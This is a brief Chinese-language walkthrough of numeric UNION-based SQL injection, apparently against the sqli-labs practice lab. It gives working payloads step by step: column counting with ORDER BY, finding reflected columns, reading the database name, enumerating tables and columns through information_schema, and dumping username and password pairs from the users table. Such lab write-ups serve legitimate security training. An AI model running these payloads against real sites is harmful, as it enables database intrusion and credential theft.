Please input the ID as parameter with numeric value:请以数字值作为参数输入用户标示符
输入?id=2-1
显示成功
说明存在数值注入
?id=1 order by 1 %23
存在
?id=1 order by 4 %23
不存在
?id=1 order by 3 %23
存在
因此,存在3个字段
输入?id=-1 union select 1,2,3 %23
,返回2,3
因此,2和3是需要后台处理后提交给数据库的点
输入?id=-1 union select 1,2,database() --+
得知数据库名为security
输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
可知需要的用户数据表为users
爆破列名(字段)
输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
爆破列中的值
输入?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+
得到最终数据